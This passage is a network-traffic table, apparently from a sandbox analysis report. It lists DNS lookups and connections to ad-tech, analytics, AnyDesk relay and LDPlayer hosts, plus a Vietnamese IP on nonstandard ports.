| US | 8.8.8.8:53 | 157.167.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | app.hubspot.com | udp |
| US | 8.8.8.8:53 | static.hsappstatic.net | udp |
| US | 104.17.176.91:443 | static.hsappstatic.net | tcp |
| US | 104.17.176.91:443 | static.hsappstatic.net | tcp |
| US | 104.17.176.91:443 | static.hsappstatic.net | tcp |
| US | 104.17.176.91:443 | static.hsappstatic.net | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.117.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.118.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.176.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | new-collect.albacross.com | udp |
| IE | 54.76.193.150:443 | new-collect.albacross.com | tcp |
| US | 8.8.8.8:53 | 150.193.76.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metrics-fe-na1.hubspot.com | udp |
| US | 8.8.8.8:53 | boot.net.anydesk.com | udp |
| FR | 57.128.101.75:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | relay-98c428ee.net.anydesk.com | udp |
| GB | 195.181.165.154:443 | relay-98c428ee.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 75.101.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.165.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| GB | 18.245.187.128:80 | api.playanext.com | tcp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7940397.fs1.hubspotusercontent-na1.net | udp |
| US | 104.18.41.124:443 | 7940397.fs1.hubspotusercontent-na1.net | tcp |
| US | 8.8.8.8:53 | 124.41.18.104.in-addr.arpa | udp |
| VN | 116.98.255.128:21325 | tcp | |
| VN | 116.98.255.128:7070 | tcp | |
| VN | 116.98.255.128:7070 | tcp | |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| GB | 142.250.180.3:443 | www.recaptcha.net | udp |
| GB | 163.70.147.23:443 | connect.facebook.net | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | 23.147.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| GB | 163.70.147.23:443 | connect.facebook.net | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 157.240.214.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 12375076.fls.doubleclick.net | udp |
| GB | 216.58.204.70:443 | 12375076.fls.doubleclick.net | tcp |
| GB | 216.58.204.70:443 | 12375076.fls.doubleclick.net | tcp |
| US | 8.8.8.8:53 | lantern.roeye.com | udp |
| IE | 18.200.217.224:443 | lantern.roeye.com | tcp |
| GB | 216.58.204.70:443 | 12375076.fls.doubleclick.net | udp |
| US | 8.8.8.8:53 | 116.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.214.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.217.200.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | snap.licdn.com | udp |
| US | 2.19.252.133:443 | snap.licdn.com | tcp |
| US | 8.8.8.8:53 | px.ads.linkedin.com | udp |
| US | 13.107.42.14:443 | px.ads.linkedin.com | tcp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.252.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.42.107.13.in-addr.arpa | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | www.ldplayer.net | udp |
| GB | 79.133.176.211:443 | www.ldplayer.net | tcp |
| GB | 79.133.176.211:443 | www.ldplayer.net | tcp |
| US | 8.8.8.8:53 | cmp.setupcmp.com | udp |
| US | 8.8.8.8:53 | cdn.ldplayer.net | udp |
| US | 104.26.5.6:443 | cmp.setupcmp.com | tcp |
| US | 104.26.5.6:443 | cmp.setupcmp.com | tcp |
| GB | 18.172.153.86:443 | cdn.ldplayer.net | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 104.26.5.6:443 | cmp.setupcmp.com | tcp |
| US | 8.8.8.8:53 | 211.176.133.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.5.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.153.172.18.in-addr.arpa | udp |
| GB | 18.172.153.86:443 | cdn.ldplayer.net | udp |
| US | 8.8.8.8:53 | stpd.cloud | udp |
| US | 104.18.30.49:443 | stpd.cloud | tcp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| GB | 142.250.180.2:443 | www.googletagservices.com | tcp |
| US | 8.8.8.8:53 | usersdk.ldmnq.com | udp |
| US | 8.8.8.8:53 | apien.ldplayer.net | udp |
| SG | 8.219.223.66:443 | usersdk.ldmnq.com | tcp |
| SG | 8.219.223.66:443 | usersdk.ldmnq.com | tcp |
| GB | 99.86.114.111:443 | apien.ldplayer.net | tcp |
| GB | 99.86.114.111:443 | apien.ldplayer.net | tcp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | bat.bing.com | udp |
| US | 8.8.8.8:53 | www.clarity.ms | udp |
| US | 8.8.8.8:53 | hm.baidu.com | udp |
| US | 8.8.8.8:53 | 49.30.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.114.86.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.223.219.8.in-addr.arpa | udp |
| US | 13.107.21.237:443 | bat.bing.com | tcp |
| US | 13.107.246.64:443 | www.clarity.ms | tcp |
| GB | 99.86.114.111:443 | apien.ldplayer.net | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | udp |
| CN | 111.45.11.83:443 | hm.baidu.com | tcp |
| CN | 111.45.11.83:443 | hm.baidu.com | tcp |
| US | 8.8.8.8:53 | tagan.adlightning.com | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 151.101.129.229:443 | cdn.jsdelivr.net | tcp |
| GB | 216.137.44.72:443 | tagan.adlightning.com | tcp |
| GB | 13.224.223.9:443 | c.amazon-adsystem.com | tcp |
| CN | 111.45.11.83:443 | hm.baidu.com | tcp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| GB | 13.224.223.9:443 | c.amazon-adsystem.com | tcp |
| GB | 52.84.90.106:443 | config.aps.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | x.clarity.ms | udp |
| US | 8.8.8.8:53 | secure.cdn.fastclick.net | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | cdn.hadronid.net | udp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | prod.us-east-1.cxm-bcn.publisher-services.amazon.dev | udp |
| US | 20.114.190.119:443 | x.clarity.ms | tcp |
| GB | 23.49.161.153:443 | secure.cdn.fastclick.net | tcp |
| GB | 23.49.161.153:443 | secure.cdn.fastclick.net | tcp |
| GB | 18.245.143.118:443 | tags.crwdcntrl.net | tcp |
| US | 52.207.34.62:443 | prod.us-east-1.cxm-bcn.publisher-services.amazon.dev | tcp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| US | 104.22.53.173:443 | cdn.hadronid.net | tcp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| IE | 34.251.46.222:443 | bcp.crwdcntrl.net | tcp |
| IE | 34.251.46.222:443 | bcp.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | id.hadron.ad.gt | udp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.246.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.203.85.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.129.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.44.137.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.223.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.154.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.143.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.90.84.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.53.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.53.22.104.in-addr.arpa | udp |
| US | 172.67.23.234:443 | id.hadron.ad.gt | tcp |
| US | 8.8.8.8:53 | 153.161.49.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.190.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.34.207.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | proc.ad.cpe.dotomi.com | udp |
| NL | 64.158.223.146:443 | proc.ad.cpe.dotomi.com | tcp |
| US | 8.8.8.8:53 | a.ad.gt | udp |
| US | 104.22.5.69:443 | a.ad.gt | tcp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| US | 8.8.8.8:53 | script.4dex.io | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | prebid-stag.setupad.net | udp |
| DE | 162.19.138.119:443 | id5-sync.com | tcp |
| DE | 162.19.138.119:443 | id5-sync.com | tcp |
| US | 104.26.8.169:443 | script.4dex.io | tcp |
| US | 8.8.8.8:53 | prg.smartadserver.com | udp |
| US | 8.8.8.8:53 | mp.4dex.io | udp |
| US | 8.8.8.8:53 | adx.adform.net | udp |
| US | 8.8.8.8:53 | prebid-eu.creativecdn.com | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| US | 8.8.8.8:53 | bidder.criteo.com | udp |
| US | 8.8.8.8:53 | prebid.a-mo.net | udp |
| US | 8.8.8.8:53 | rtb.adxpremium.services | udp |
| DE | 162.19.138.119:443 | id5-sync.com | tcp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | 222.46.251.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.23.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.223.158.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.5.22.104.in-addr.arpa | udp |
| NL | 185.184.8.90:443 | prebid-eu.creativecdn.com | tcp |
| NL | 185.184.8.90:443 | prebid-eu.creativecdn.com | tcp |
| US | 35.227.252.103:443 | rtb.openx.net | tcp |
| US | 35.227.252.103:443 | rtb.openx.net | tcp |
| FR | 149.202.238.96:443 | prg.smartadserver.com | tcp |
| FR | 149.202.238.96:443 | prg.smartadserver.com | tcp |
| DK | 37.157.6.233:443 | adx.adform.net | tcp |
| DK | 37.157.6.233:443 | adx.adform.net | tcp |
| NL | 178.250.1.8:443 | bidder.criteo.com | tcp |
| NL | 178.250.1.8:443 | bidder.criteo.com | tcp |
| US | 172.64.153.78:443 | mp.4dex.io | tcp |
| US | 172.64.153.78:443 | mp.4dex.io | tcp |
| NL | 185.106.140.18:443 | rtb.adxpremium.services | tcp |
| NL | 185.106.140.18:443 | rtb.adxpremium.services | tcp |
| NL | 145.40.97.66:443 | prebid.a-mo.net | tcp |
| NL | 145.40.97.66:443 | prebid.a-mo.net | tcp |
| DE | 162.19.138.116:443 | lb.eu-1-id5-sync.com | tcp |
| US | 104.26.8.178:443 | prebid-stag.setupad.net | tcp |
| US | 104.26.8.178:443 | prebid-stag.setupad.net | tcp |
| US | 104.26.8.178:443 | prebid-stag.setupad.net | tcp |
| US | 104.26.8.178:443 | prebid-stag.setupad.net | tcp |
| US | 8.8.8.8:53 | cadmus.script.ac | udp |
| US | 104.26.8.169:443 | script.4dex.io | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| DE | 162.19.138.119:443 | lb.eu-1-id5-sync.com | tcp |
| US | 104.18.23.145:443 | cadmus.script.ac | tcp |
| US | 104.26.8.169:443 | script.4dex.io | tcp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| US | 8.8.8.8:53 | cm.adform.net | udp |
| US | 35.244.159.8:443 | u.openx.net | tcp |
| US | 35.244.159.8:443 | u.openx.net | tcp |
| DK | 37.157.6.232:443 | cm.adform.net | tcp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | 888a027caaa9f7c96f3f23f688c8247e.safeframe.googlesyndication.com | udp |
| NL | 185.89.210.180:443 | ib.adnxs.com | tcp |
| GB | 172.217.169.65:443 | 888a027caaa9f7c96f3f23f688c8247e.safeframe.googlesyndication.com | tcp |
| US | 35.244.159.8:443 | u.openx.net | udp |
| US | 8.8.8.8:53 | 26e432fb424cc230e40c74bea40b3501.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | u.4dex.io | udp |
| US | 8.8.8.8:53 | cms.quantserve.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | c1.adform.net | udp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 34.149.40.38:443 | u.4dex.io | tcp |
| DK | 37.157.2.230:443 | c1.adform.net | tcp |
| DE | 91.228.74.200:443 | cms.quantserve.com | tcp |
| IE | 67.220.228.203:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 15.197.193.217:443 | match.adsrvr.org | tcp |
| GB | 216.58.201.98:443 | cm.g.doubleclick.net | tcp |
| GB | 216.58.201.98:443 | cm.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | openx2-match.dotomi.com | udp |
| US | 8.8.8.8:53 | sync.srv.stackadapt.com | udp |
| US | 35.227.252.103:443 | rtb.openx.net | udp |
| US | 8.8.8.8:53 | pr-bh.ybp.yahoo.com | udp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | creativecdn.com | udp |
| US | 8.8.8.8:53 | dis.eu.criteo.com | udp |
| NL | 89.207.16.140:443 | openx2-match.dotomi.com | tcp |
| US | 54.147.95.198:443 | sync.srv.stackadapt.com | tcp |
| IE | 108.129.22.139:443 | pr-bh.ybp.yahoo.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| NL | 178.250.1.9:443 | dis.eu.criteo.com | tcp |
| US | 8.8.8.8:53 | eu-u.openx.net | udp |
| US | 8.8.8.8:53 | us-u.openx.net | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | ldcdn.ldmnq.com | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| GB | 79.133.176.219:443 | ldcdn.ldmnq.com | tcp |
| GB | 79.133.176.219:443 | ldcdn.ldmnq.com | tcp |
| US | 8.8.8.8:53 | 169.8.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.252.227.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.153.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.8.184.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.238.202.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.140.106.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.97.40.145.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.6.157.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.8.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.23.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.159.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.6.157.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.40.149.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.193.197.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.74.228.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.2.157.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.16.207.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.22.129.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.149.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.95.147.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ads.avct.cloud | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| US | 8.8.8.8:53 | node.setupad.com | udp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| DE | 159.89.25.223:443 | node.setupad.com | tcp |
| US | 8.8.8.8:53 | ssbsync-global.smartadserver.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| GB | 2.21.188.239:443 | ads.pubmatic.com | tcp |
| FR | 5.135.209.100:443 | ssbsync-global.smartadserver.com | tcp |
| US | 8.8.8.8:53 | 219.176.133.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.25.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.188.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.209.135.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rtb.gumgum.com | udp |
| IE | 52.208.44.24:443 | rtb.gumgum.com | tcp |
| US | 8.8.8.8:53 | ice.360yield.com | udp |
| US | 8.8.8.8:53 | ads.us.e-planning.net | udp |
| IE | 54.220.54.255:443 | ice.360yield.com | tcp |
| NL | 193.3.178.4:443 | ads.us.e-planning.net | tcp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 8.8.8.8:53 | s.e-planning.net | udp |
| US | 8.8.8.8:53 | cookies.nextmillmedia.com | udp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| US | 8.8.8.8:53 | ssum.casalemedia.com | udp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | spl.zeotap.com | udp |
| US | 34.193.221.2:443 | cookies.nextmillmedia.com | tcp |
| NL | 193.3.178.1:443 | s.e-planning.net | tcp |
| US | 8.8.8.8:53 | u-ams03.e-planning.net | udp |
| DE | 51.89.9.252:443 | onetag-sys.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| US | 104.18.36.155:443 | ssum.casalemedia.com | tcp |
| US | 34.149.40.38:443 | u.4dex.io | udp |
| US | 172.67.40.173:443 | spl.zeotap.com | tcp |
| NL | 193.3.178.4:443 | u-ams03.e-planning.net | tcp |
| NL | 193.3.178.4:443 | u-ams03.e-planning.net | tcp |
| US | 8.8.8.8:53 | 24.44.208.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 255.54.220.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.178.3.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.178.3.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.174.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.9.89.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.36.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.40.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.221.193.34.in-addr.arpa | udp |
| US | 104.18.36.155:443 | ssum.casalemedia.com | udp |
| US | 8.8.8.8:53 | sync.a-mo.net | udp |
| US | 8.8.8.8:53 | adxbid.info | udp |
| US | 8.8.8.8:53 | setupad-d.openx.net | udp |
| US | 104.21.48.215:443 | adxbid.info | tcp |
| NL | 145.40.97.67:443 | sync.a-mo.net | tcp |
| US | 8.8.8.8:53 | um.simpli.fi | udp |
| US | 8.8.8.8:53 | pixel-sync.sitescout.com | udp |
| US | 8.8.8.8:53 | image6.pubmatic.com | udp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | tcp |
| NL | 35.204.74.118:443 | um.simpli.fi | tcp |
| US | 8.8.8.8:53 | assets.a-mo.net | udp |
| GB | 185.64.190.78:443 | image6.pubmatic.com | tcp |
| US | 8.8.8.8:53 | p4-hsidf3slx6c5y-ibspcd5l6m5eb2yt-if-v6exp3-v4.metric.gstatic.com | udp |
| US | 104.19.158.19:443 | assets.a-mo.net | tcp |
| US | 8.8.8.8:53 | 215.48.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.97.40.145.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.216.36.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.74.204.35.in-addr.arpa | udp |
| GB | 216.58.204.67:443 | p4-hsidf3slx6c5y-ibspcd5l6m5eb2yt-if-v6exp3-v4.metric.gstatic.com | tcp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| GB | 216.58.204.67:443 | p4-hsidf3slx6c5y-ibspcd5l6m5eb2yt-if-v6exp3-v4.metric.gstatic.com | udp |
| US | 8.8.8.8:53 | dis.criteo.com | udp |
| US | 8.8.8.8:53 | storage.googleapis.com | udp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| GB | 142.250.180.27:443 | storage.googleapis.com | tcp |
| GB | 142.250.180.27:443 | storage.googleapis.com | tcp |
| US | 8.8.8.8:53 | simage2.pubmatic.com | udp |
| NL | 198.47.127.205:443 | simage2.pubmatic.com | tcp |
| NL | 198.47.127.205:443 | simage2.pubmatic.com | tcp |
| US | 8.8.8.8:53 | 78.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.158.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.164.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | image2.pubmatic.com | udp |
| US | 8.8.8.8:53 | sonata-notifications.taptapnetworks.com | udp |
| DE | 3.122.33.86:443 | sonata-notifications.taptapnetworks.com | tcp |
| US | 8.8.8.8:53 | sync.targeting.unrulymedia.com | udp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| US | 8.8.8.8:53 | dsp.adfarm1.adition.com | udp |
| US | 8.8.8.8:53 | t.adx.opera.com | udp |
| DE | 85.114.159.118:443 | dsp.adfarm1.adition.com | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| US | 8.8.8.8:53 | sync-tm.everesttech.net | udp |
| US | 8.8.8.8:53 | ad.mrtnsvr.com | udp |
| US | 151.101.130.49:443 | sync-tm.everesttech.net | tcp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| US | 8.8.8.8:53 | match.prod.bidr.io | udp |
| IE | 52.213.253.239:443 | match.prod.bidr.io | tcp |
| US | 8.8.8.8:53 | 86.33.122.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.213.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.159.114.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.130.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.163.102.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.ldplayer.net | udp |
| US | 8.8.8.8:53 | sync.e-planning.net | udp |
| NL | 193.3.178.3:443 | sync.e-planning.net | tcp |
| GB | 18.172.153.76:443 | cdn.ldplayer.net | tcp |
| US | 8.8.8.8:53 | csync.loopme.me | udp |
| NL | 35.214.130.85:443 | csync.loopme.me | tcp |
| GB | 216.58.201.98:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | d5p.de17a.com | udp |
| SE | 213.155.156.169:443 | d5p.de17a.com | tcp |
| US | 8.8.8.8:53 | bh.contextweb.com | udp |
| NL | 208.93.169.131:443 | bh.contextweb.com | tcp |
| US | 8.8.8.8:53 | ipac.ctnsnet.com | udp |
| US | 35.186.193.173:443 | ipac.ctnsnet.com | tcp |
| US | 8.8.8.8:53 | rtb-csync.smartadserver.com | udp |
| NL | 89.149.193.104:443 | rtb-csync.smartadserver.com | tcp |
| US | 8.8.8.8:53 | p.rfihub.com | udp |
| NL | 193.0.160.131:443 | p.rfihub.com | tcp |
| US | 8.8.8.8:53 | core.iprom.net | udp |
| SI | 195.5.165.20:443 | core.iprom.net | tcp |
| US | 8.8.8.8:53 | 239.253.213.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.153.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.3.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.130.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.156.155.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.169.93.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.216.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.178.204.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.193.186.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.193.149.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.160.0.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | green.erne.co | udp |
| FR | 141.94.242.226:443 | green.erne.co | tcp |
| US | 8.8.8.8:53 | cm-supply-web.gammaplatform.com | udp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
| US | 8.8.8.8:53 | pixel-eu.onaudience.com | udp |
| US | 8.8.8.8:53 | sync.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | cr.frontend.weborama.fr | udp |
| US | 8.8.8.8:53 | mwzeom.zeotap.com | udp |
| FR | 54.38.113.7:443 | pixel-eu.onaudience.com | tcp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | tcp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | udp |
| US | 8.8.8.8:53 | pubmatic-match.dotomi.com | udp |
| US | 8.8.8.8:53 | match.adsby.bidtheatre.com | udp |
| DE | 3.71.149.231:443 | ups.analytics.yahoo.com | tcp |
| NL | 134.122.57.34:443 | match.adsby.bidtheatre.com | tcp |
| NL | 63.215.202.137:443 | pubmatic-match.dotomi.com | tcp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
